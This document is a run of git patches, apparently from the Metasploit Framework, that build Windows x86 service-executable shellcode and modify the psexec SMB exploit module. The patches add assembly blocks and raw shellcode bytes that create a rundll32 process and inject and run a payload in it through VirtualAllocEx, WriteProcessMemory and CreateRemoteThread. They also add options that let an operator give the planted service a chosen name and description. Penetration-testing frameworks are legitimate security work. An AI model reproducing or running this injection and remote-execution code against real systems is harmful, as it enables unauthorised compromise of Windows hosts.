"\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + - "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + - "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" - - to_winpe_only(framework, code_service + code, opts) + "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1\x8D\x85" + + [svcmain_code_offset].pack(' Date: Thu, 2 Jan 2014 20:22:20 +0100 Subject: [PATCH 295/853] Change author of single_service_stuff.asm --- .../shellcode/windows/x86/src/single/single_service_stuff.asm | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm index e5aad30bcf..e63119c276 100644 --- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm +++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm @@ -1,5 +1,5 @@ ;-----------------------------------------------------------------------------; -; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Author: agix (florian.gaultier[at]gmail[dot]com) ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 ; Version: 1.0 (28 July 2009) ; Size: 189 bytes + strlen(libpath) + 1 From 25d48b73009aca99a6665c10cec07d3d621b3de2 Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Fri, 3 Jan 2014 12:16:37 +0100 Subject: [PATCH 296/853] Add create_remote_process block, now used in exe_service generation --- .../src/block/block_create_remote_process.asm | 82 +++++++++++++++++++ .../single/single_create_remote_process.asm | 17 ++++ .../x86/src/single/single_service_stuff.asm | 3 +- lib/msf/util/exe.rb | 32 +++++--- 4 files changed, 123 insertions(+), 11 deletions(-) create mode 100644 external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm create mode 100644 external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm diff --git a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm new file mode 100644 index 0000000000..d28a4eee10 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm @@ -0,0 +1,82 @@ +;-----------------------------------------------------------------------------; +; Author: agix (florian.gaultier[at]gmail[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Size: 137 bytes +;-----------------------------------------------------------------------------; + +[BITS 32] +; Input: EBP must be the address of 'api_call'. + +xor edi, edi +push 0x00000004 ;PAGE_READWRITE +push 0x00001000 ;MEM_COMMIT +push 0x00000054 ;STARTUPINFO+PROCESS_INFORMATION +push edi +push 0xE553A458 ;call VirtualAlloc() +call ebp + +mov dword [eax], 0x44 +lea esi, [eax+0x44] +push edi +push 0x6578652e +push 0x32336c6c +push 0x646e7572 +mov ecx, esp ;"rundll32.exe" +push esi ;lpProcessInformation +push eax ;lpStartupInfo +push edi ;lpCurrentDirectory +push edi ;lpEnvironment +push 0x00000044 ;dwCreationFlags +push edi ;bInheritHandles +push edi ;lpThreadAttributes +push edi ;lpProcessAttributes +push ecx ;lpCommandLine +push edi ;lpApplicationName +push 0x863FCC79 +call ebp ;call CreatProcessA() + +mov ecx, [esi] +push 0x00000040 ;PAGE_EXECUTE_READWRITE +push 0x00001000 ;MEM_COMMIT +push 0x00001000 ;Next Shellcode Size +push edi +push ecx ;hProcess +push 0x3F9287AE ;call VirtualAllocEx() +call ebp + +mov edi, eax +mov ecx, [esi] +lea edx, [ebp+0x12a] ;pointer on the next shellcode +push esp +push 0x00001000 ;Next Shellcode Size +push edx ; +push eax ;lBaseAddress +push ecx ;hProcess +push 0xE7BDD8C5 +call ebp ;call WriteProcessMemory() + +xor eax, eax +mov ecx, [esi] +push eax ;lpThreadId +push eax ;dwCreationFlags +push eax ;lpParameter +push edi ;lpStartAddress +push eax ;dwStackSize +push eax ;lpThreadAttributes +push ecx ;hProcess +push 0x799AACC6 +call ebp ;call CreateRemoteThread() + +mov ecx, [esi] +push ecx +push 0x528796C6 +call ebp ;call CloseHandle() + +mov ecx, [esi+0x4] +push ecx +push 0x528796C6 +call ebp ;call CloseHandle() + +push edi +push 0x56A2B5F0 +call ebp ;call ExitProcess(0) \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm new file mode 100644 index 0000000000..1b73bb1abc --- /dev/null +++ b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm @@ -0,0 +1,17 @@ +;-----------------------------------------------------------------------------; +; Author: agix (florian.gaultier[at]gmail[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 189 bytes + strlen(libpath) + 1 +; Build: >build.py single_create_remote_process +;-----------------------------------------------------------------------------; + +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; pop off the address of 'api_call' for calling later. +%include "./src/block/block_create_remote_process.asm" \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm index e63119c276..40cd4cd111 100644 --- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm +++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm @@ -14,4 +14,5 @@ %include "./src/block/block_api.asm" start: ; pop ebp ; pop off the address of 'api_call' for calling later. -%include "./src/block/block_service.asm" \ No newline at end of file +%include "./src/block/block_service.asm" +%include "./src/block/block_create_remote_process.asm" \ No newline at end of file diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index e52fc625a4..ea17a5bb19 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -524,6 +524,9 @@ require 'msf/core/exe/segment_injector' precode_size -= 0x0d svcctrlhandler_code_offset = precode_size + pushed_service_name.length + precode_size += 0xe4 + shellcode_code_offset = precode_size + (pushed_service_name.length * 2) + # code_service could be encoded in the future code_service = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + @@ -536,16 +539,25 @@ require 'msf/core/exe/segment_injector' "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + - "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1\x8D\x85" + - [svcmain_code_offset].pack(' Date: Fri, 3 Jan 2014 13:27:39 +0100 Subject: [PATCH 297/853] Improve block_create_remote_process to point on shellcode everytime --- .../x86/src/block/block_create_remote_process.asm | 10 +++++++--- .../windows/x86/src/block/block_service.asm | 2 +- .../src/single/single_create_remote_process.asm | 3 +-- .../x86/src/single/single_service_stuff.asm | 3 +-- lib/msf/util/exe.rb | 14 ++++++-------- 5 files changed, 16 insertions(+), 16 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm index d28a4eee10..578ecd32a4 100644 --- a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm +++ b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm @@ -1,7 +1,7 @@ ;-----------------------------------------------------------------------------; ; Author: agix (florian.gaultier[at]gmail[dot]com) ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 -; Size: 137 bytes +; Size: 307 bytes ;-----------------------------------------------------------------------------; [BITS 32] @@ -44,9 +44,13 @@ push ecx ;hProcess push 0x3F9287AE ;call VirtualAllocEx() call ebp +call me2 +me2: +pop edx + mov edi, eax mov ecx, [esi] -lea edx, [ebp+0x12a] ;pointer on the next shellcode +lea edx, [edx+0x47] ;pointer on the next shellcode push esp push 0x00001000 ;Next Shellcode Size push edx ; @@ -79,4 +83,4 @@ call ebp ;call CloseHandle() push edi push 0x56A2B5F0 -call ebp ;call ExitProcess(0) \ No newline at end of file +call ebp ;call ExitProcess(0) diff --git a/external/source/shellcode/windows/x86/src/block/block_service.asm b/external/source/shellcode/windows/x86/src/block/block_service.asm index cae63fcd34..2ba827b154 100644 --- a/external/source/shellcode/windows/x86/src/block/block_service.asm +++ b/external/source/shellcode/windows/x86/src/block/block_service.asm @@ -1,7 +1,7 @@ ;-----------------------------------------------------------------------------; ; Author: agix (florian.gaultier[at]gmail[dot]com) ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 -; Size: 137 bytes +; Size: 448 bytes ;-----------------------------------------------------------------------------; [BITS 32] diff --git a/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm index 1b73bb1abc..2c44b3dbad 100644 --- a/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm +++ b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm @@ -1,8 +1,7 @@ ;-----------------------------------------------------------------------------; ; Author: agix (florian.gaultier[at]gmail[dot]com) ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 -; Version: 1.0 (28 July 2009) -; Size: 189 bytes + strlen(libpath) + 1 +; Size: 307 bytes ; Build: >build.py single_create_remote_process ;-----------------------------------------------------------------------------; diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm index 40cd4cd111..5c848922ce 100644 --- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm +++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm @@ -1,8 +1,7 @@ ;-----------------------------------------------------------------------------; ; Author: agix (florian.gaultier[at]gmail[dot]com) ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 -; Version: 1.0 (28 July 2009) -; Size: 189 bytes + strlen(libpath) + 1 +; Size: 448 bytes ; Build: >build.py single_service_stuff ;-----------------------------------------------------------------------------; diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index ea17a5bb19..3413c4ebc1 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -524,9 +524,6 @@ require 'msf/core/exe/segment_injector' precode_size -= 0x0d svcctrlhandler_code_offset = precode_size + pushed_service_name.length - precode_size += 0xe4 - shellcode_code_offset = precode_size + (pushed_service_name.length * 2) - # code_service could be encoded in the future code_service = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + @@ -552,11 +549,12 @@ require 'msf/core/exe/segment_injector' "\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" + "\x44\x57\x57\x57\x51\x57\x68\x79\xCC\x3F\x86\xFF\xD5\x8B\x0E\x6A" + "\x40\x68\x00\x10\x00\x00\x68"+[code.length].pack(' Date: Fri, 3 Jan 2014 15:12:25 +0100 Subject: [PATCH 298/853] Improve service_block with service_stopped block to cleanly terminate service --- .../src/block/block_create_remote_process.asm | 8 ++---- .../x86/src/single/single_service_stuff.asm | 7 ++++- lib/msf/util/exe.rb | 26 ++++++++++++++----- 3 files changed, 28 insertions(+), 13 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm index 578ecd32a4..50252ad53e 100644 --- a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm +++ b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm @@ -50,7 +50,7 @@ pop edx mov edi, eax mov ecx, [esi] -lea edx, [edx+0x47] ;pointer on the next shellcode +add dword edx, 0x112247 ;pointer on the next shellcode push esp push 0x00001000 ;Next Shellcode Size push edx ; @@ -79,8 +79,4 @@ call ebp ;call CloseHandle() mov ecx, [esi+0x4] push ecx push 0x528796C6 -call ebp ;call CloseHandle() - -push edi -push 0x56A2B5F0 -call ebp ;call ExitProcess(0) +call ebp ;call CloseHandle() \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm index 5c848922ce..fe3a8aa3a0 100644 --- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm +++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm @@ -14,4 +14,9 @@ start: ; pop ebp ; pop off the address of 'api_call' for calling later. %include "./src/block/block_service.asm" -%include "./src/block/block_create_remote_process.asm" \ No newline at end of file +%include "./src/block/block_create_remote_process.asm" +%include "./src/block/block_service_stopped.asm" + +push edi +push 0x56A2B5F0 +call ebp ;call ExitProcess(0) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 3413c4ebc1..d7d9a0944c 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -345,6 +345,9 @@ require 'msf/core/exe/segment_injector' characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] if (virtualAddress...virtualAddress+sizeOfRawData).include?(pe.hdr.opt.AddressOfEntryPoint) + if sizeOfRawData Date: Sat, 4 Jan 2014 21:11:53 +0100 Subject: [PATCH 299/853] Prevent import table overwritting by shifting entry point --- lib/msf/util/exe.rb | 23 ++++++++++++++--------- 1 file changed, 14 insertions(+), 9 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index d7d9a0944c..570d66f98f 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -314,20 +314,18 @@ require 'msf/core/exe/segment_injector' } pe_header_size = 0x18 + entryPoint_offset = 0x28 section_size = 0x28 characteristics_offset = 0x24 virtualAddress_offset = 0x0c sizeOfRawData_offset = 0x10 - sections_table_rva = + sections_table_offset = pe._dos_header.v['e_lfanew'] + pe._file_header.v['SizeOfOptionalHeader'] + pe_header_size - sections_table_offset = pe.rva_to_file_offset(sections_table_rva) - - sections_table_characteristics_offset = - pe.rva_to_file_offset(sections_table_rva + characteristics_offset) + sections_table_characteristics_offset = sections_table_offset + characteristics_offset sections_header = [] pe._file_header.v['NumberOfSections'].times { |i| @@ -338,15 +336,22 @@ require 'msf/core/exe/segment_injector' ] } + addressOfEntryPoint = pe.hdr.opt.AddressOfEntryPoint + # look for section with entry point sections_header.each do |sec| virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] - if (virtualAddress...virtualAddress+sizeOfRawData).include?(pe.hdr.opt.AddressOfEntryPoint) - if sizeOfRawData Date: Mon, 6 Jan 2014 17:26:35 +0100 Subject: [PATCH 300/853] up block_service_stopped.asm --- .../x86/src/block/block_service_stopped.asm | 45 +++++++++++++++++++ lib/msf/util/exe.rb | 2 +- 2 files changed, 46 insertions(+), 1 deletion(-) create mode 100644 external/source/shellcode/windows/x86/src/block/block_service_stopped.asm diff --git a/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm b/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm new file mode 100644 index 0000000000..15d82b9ef7 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm @@ -0,0 +1,45 @@ +;-----------------------------------------------------------------------------; +; Author: agix (florian.gaultier[at]gmail[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Size: 448 bytes +;-----------------------------------------------------------------------------; + +[BITS 32] +; Input: EBP must be the address of 'api_call'. + +call me2 +me2: +pop edi +jmp 0x7 +pop eax +pop eax +pop eax +pop eax +xor eax,eax +ret +push 0x00464349 +push 0x56524553 +mov ecx, esp ;SVCNAME +lea eax, [edi+0x3];SvcCtrlHandler +push 0x00000000 +push eax +push ecx +push 0x5244AA0B +call ebp ;RegisterServiceCtrlHandlerExA +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000001 +push 0x00000010 +mov ecx, esp +push 0x00000000 +push ecx +push eax +push 0x7D3755C6 +call ebp ;SetServiceStatus RUNNING +push 0x0 +push 0x56a2b5f0 +call ebp ;ExitProcess \ No newline at end of file diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 570d66f98f..ec12f16ef7 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -346,7 +346,7 @@ require 'msf/core/exe/segment_injector' if (virtualAddress...virtualAddress+sizeOfRawData).include?(addressOfEntryPoint) importsTable = pe.hdr.opt.DataDirectory[8..(8+4)].unpack('L')[0] - if (importsTable-addressOfEntryPoint) Date: Mon, 6 Jan 2014 19:18:43 +0100 Subject: [PATCH 301/853] Try to add SERVICE_DESCRIPTION options to psexec, but it doesn't seem to work... --- .../block_service_change_description.asm | 37 +++++++++++++++++++ .../x86/src/block/block_service_stopped.asm | 4 +- .../x86/src/single/single_service_stuff.asm | 1 + lib/msf/util/exe.rb | 17 ++++++++- modules/exploits/windows/smb/psexec.rb | 3 +- 5 files changed, 58 insertions(+), 4 deletions(-) create mode 100644 external/source/shellcode/windows/x86/src/block/block_service_change_description.asm diff --git a/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm b/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm new file mode 100644 index 0000000000..5f6b939222 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm @@ -0,0 +1,37 @@ +;-----------------------------------------------------------------------------; +; Author: agix (florian.gaultier[at]gmail[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Size: 448 bytes +;-----------------------------------------------------------------------------; + +[BITS 32] +; Input: EBP must be the address of 'api_call'. + +push 0x000F01FF +push 0x00000000 +push 0x00000000 +push 0x7636F067 +call ebp ;OpenSCManagerA +mov edi, eax +push 0x00464349 +push 0x56524553 +mov ecx, esp ;SVCNAME +push 0x000F01FF +push ecx +push eax +push 0x404B2856 +call ebp ;OpenServiceA +mov esi, eax +push 0x00464349 +push 0x56524553 +mov ecx, esp ;SVCDESCRIPTION +push 0x00000001 ;SERVICE_CONFIG_DESCRIPTION +push eax +push 0xED35B087 +call ebp ;ChangeServiceConfig2A +push esi +push 0xAD77EADE ;CloseServiceHandle +call ebp +push edi +push 0xAD77EADE ;CloseServiceHandle +call ebp \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm b/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm index 15d82b9ef7..10c8374c32 100644 --- a/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm +++ b/external/source/shellcode/windows/x86/src/block/block_service_stopped.asm @@ -7,8 +7,8 @@ [BITS 32] ; Input: EBP must be the address of 'api_call'. -call me2 -me2: +call me3 +me3: pop edi jmp 0x7 pop eax diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm index fe3a8aa3a0..2de5d9a021 100644 --- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm +++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm @@ -14,6 +14,7 @@ start: ; pop ebp ; pop off the address of 'api_call' for calling later. %include "./src/block/block_service.asm" +%include "./src/block/block_service_change_description.asm" %include "./src/block/block_create_remote_process.asm" %include "./src/block/block_service_stopped.asm" diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index ec12f16ef7..6526bfde06 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -539,6 +539,20 @@ require 'msf/core/exe/segment_injector' "\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" + "\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5" + code_service_description = "" + + if opts[:servicedescription] + pushed_service_description = string_to_pushes(opts[:servicedescription]) + + code_service_description = + "\x68\xFF\x01\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" + + "\x76\xFF\xD5\x89\xC7"+pushed_service_name+"\x89\xE1\x68" + + "\xFF\x01\x0F\x00\x51\x50\x68\x56\x28\x4B\x40\xFF\xD5\x89\xC6" + + pushed_service_description+"\x89\xE1\x6A\x01\x50\x68\x87\xB0\x35" + + "\xED\xFF\xD5\x56\x68\xDE\xEA\x77\xAD\xFF\xD5\x57\x68\xDE\xEA\x77" + + "\xAD\xFF\xD5" + end + precode_size = 0x42 shellcode_code_offset = code_service_stopped.length + precode_size @@ -561,7 +575,8 @@ require 'msf/core/exe/segment_injector' [hash_code_offset].pack(' Date: Mon, 6 Jan 2014 19:49:52 +0100 Subject: [PATCH 302/853] correct error in block service_change_description --- .../x86/src/block/block_service_change_description.asm | 6 +++++- lib/msf/util/exe.rb | 8 ++++---- 2 files changed, 9 insertions(+), 5 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm b/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm index 5f6b939222..cdd1ba61bc 100644 --- a/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm +++ b/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm @@ -7,7 +7,7 @@ [BITS 32] ; Input: EBP must be the address of 'api_call'. -push 0x000F01FF +push 0x000F003F push 0x00000000 push 0x00000000 push 0x7636F067 @@ -24,7 +24,11 @@ call ebp ;OpenServiceA mov esi, eax push 0x00464349 push 0x56524553 +mov ecx, esp +push 0x00000000 +push ecx mov ecx, esp ;SVCDESCRIPTION +push ecx push 0x00000001 ;SERVICE_CONFIG_DESCRIPTION push eax push 0xED35B087 diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 6526bfde06..c03e02dc7f 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -545,12 +545,12 @@ require 'msf/core/exe/segment_injector' pushed_service_description = string_to_pushes(opts[:servicedescription]) code_service_description = - "\x68\xFF\x01\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" + + "\x68\x3F\x00\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" + "\x76\xFF\xD5\x89\xC7"+pushed_service_name+"\x89\xE1\x68" + "\xFF\x01\x0F\x00\x51\x50\x68\x56\x28\x4B\x40\xFF\xD5\x89\xC6" + - pushed_service_description+"\x89\xE1\x6A\x01\x50\x68\x87\xB0\x35" + - "\xED\xFF\xD5\x56\x68\xDE\xEA\x77\xAD\xFF\xD5\x57\x68\xDE\xEA\x77" + - "\xAD\xFF\xD5" + pushed_service_description+"\x89\xE1\x6A\x00\x51\x89\xE1\x51" + + "\x6A\x01\x50\x68\x87\xB0\x35\xED\xFF\xD5\x56\x68\xDE\xEA\x77" + + "\xAD\xFF\xD5\x57\x68\xDE\xEA\x77\xAD\xFF\xD5" end precode_size = 0x42 From 808f87d213de5f1881b908c21dc9a5fe4495af1a Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Mon, 6 Jan 2014 22:00:18 +0100 Subject: [PATCH 303/853] SERVICE_DESCRIPTION doesn't concern this PR --- lib/msf/util/exe.rb | 17 +---------------- modules/exploits/windows/smb/psexec.rb | 8 +++++--- 2 files changed, 6 insertions(+), 19 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index c03e02dc7f..ec12f16ef7 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -539,20 +539,6 @@ require 'msf/core/exe/segment_injector' "\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" + "\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5" - code_service_description = "" - - if opts[:servicedescription] - pushed_service_description = string_to_pushes(opts[:servicedescription]) - - code_service_description = - "\x68\x3F\x00\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" + - "\x76\xFF\xD5\x89\xC7"+pushed_service_name+"\x89\xE1\x68" + - "\xFF\x01\x0F\x00\x51\x50\x68\x56\x28\x4B\x40\xFF\xD5\x89\xC6" + - pushed_service_description+"\x89\xE1\x6A\x00\x51\x89\xE1\x51" + - "\x6A\x01\x50\x68\x87\xB0\x35\xED\xFF\xD5\x56\x68\xDE\xEA\x77" + - "\xAD\xFF\xD5\x57\x68\xDE\xEA\x77\xAD\xFF\xD5" - end - precode_size = 0x42 shellcode_code_offset = code_service_stopped.length + precode_size @@ -575,8 +561,7 @@ require 'msf/core/exe/segment_injector' [hash_code_offset].pack(' servicename } + if (datastore['PAYLOAD'].include? 'x64') + opts.merge!({ :arch => ARCH_X64 }) + end exe = generate_payload_exe_service(opts) fd << exe From 87be2e674a48fabe47ba47ecde80958b06de9324 Mon Sep 17 00:00:00 2001 From: agix Date: Wed, 26 Mar 2014 19:13:54 +0100 Subject: [PATCH 304/853] Rebase on https://github.com/rapid7/metasploit-framework/pull/2831 and adapt to the new mixin --- lib/msf/core/exploit/smb/psexec.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb index d3a6ccf13c..71a4b4cbf4 100644 --- a/lib/msf/core/exploit/smb/psexec.rb +++ b/lib/msf/core/exploit/smb/psexec.rb @@ -52,7 +52,7 @@ module Exploit::Remote::SMB::Psexec # @param command [String] Should be a valid windows command # @param disconnect [Boolean] Disconnect afterwards # @return [Boolean] Whether everything went well - def psexec(command, disconnect=true, service_description=nil) + def psexec(command, disconnect=true, service_description=nil, service_name=nil, display_name=nil) simple.connect("\\\\#{datastore['RHOST']}\\IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) vprint_status("#{peer} - Binding to #{handle} ...") @@ -70,8 +70,9 @@ module Exploit::Remote::SMB::Psexec print_error("#{peer} - Error getting scm handle: #{e}") return false end - servicename = Rex::Text.rand_text_alpha(11) - displayname = Rex::Text.rand_text_alpha(16) + servicename = service_name || Rex::Text.rand_text_alpha(11) + displayname = display_name || Rex::Text.rand_text_alpha(16) + servicedescription = service_description || Rex::Text.rand_text_alpha(rand(32)+1) svc_handle = nil svc_status = nil From d3f2414d09b25b7802cf5669f66b48e0ba1d6f54 Mon Sep 17 00:00:00 2001 From: agix Date: Wed, 26 Mar 2014 20:00:29 +0100 Subject: [PATCH 305/853] Fix merging typo --- modules/exploits/windows/smb/psexec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index ec04e4b984..0ce4260aff 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]), OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]), OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]), - OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil]) + OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil]), OptString.new('SERVICE_NAME', [false, "Servicename to to be used on target for the service binary and manager",nil]), OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil]) ], self.class) From 1a3b31926285cb0d219d6f3cd28a937e80579e67 Mon Sep 17 00:00:00 2001 From: agix Date: Wed, 2 Apr 2014 10:20:56 +0200 Subject: [PATCH 306/853] rebase to use the mixin psexec --- lib/msf/core/exploit/smb/psexec.rb | 1 - modules/exploits/windows/smb/psexec.rb | 7 ++----- 2 files changed, 2 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb index 71a4b4cbf4..471310a12e 100644 --- a/lib/msf/core/exploit/smb/psexec.rb +++ b/lib/msf/core/exploit/smb/psexec.rb @@ -72,7 +72,6 @@ module Exploit::Remote::SMB::Psexec end servicename = service_name || Rex::Text.rand_text_alpha(11) displayname = display_name || Rex::Text.rand_text_alpha(16) - servicedescription = service_description || Rex::Text.rand_text_alpha(rand(32)+1) svc_handle = nil svc_status = nil diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 0ce4260aff..03027e943d 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote simple.disconnect("ADMIN$") else servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8) - servicedescription = datastore['SERVICE_DESCRIPTION'] || rand_text_alpha(rand(32)+1) + servicedescription = datastore['SERVICE_DESCRIPTION'] displayname = datastore['SERVICE_DISPLAYNAME'] || 'M' + rand_text_alpha(rand(32)+1) # Upload the shellcode to a file @@ -179,9 +179,6 @@ class Metasploit3 < Msf::Exploit::Remote end exe = '' opts = { :servicename => servicename } - if (datastore['PAYLOAD'].include? 'x64') - opts.merge!({ :arch => ARCH_X64 }) - end exe = generate_payload_exe_service(opts) fd << exe @@ -205,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote file_location = 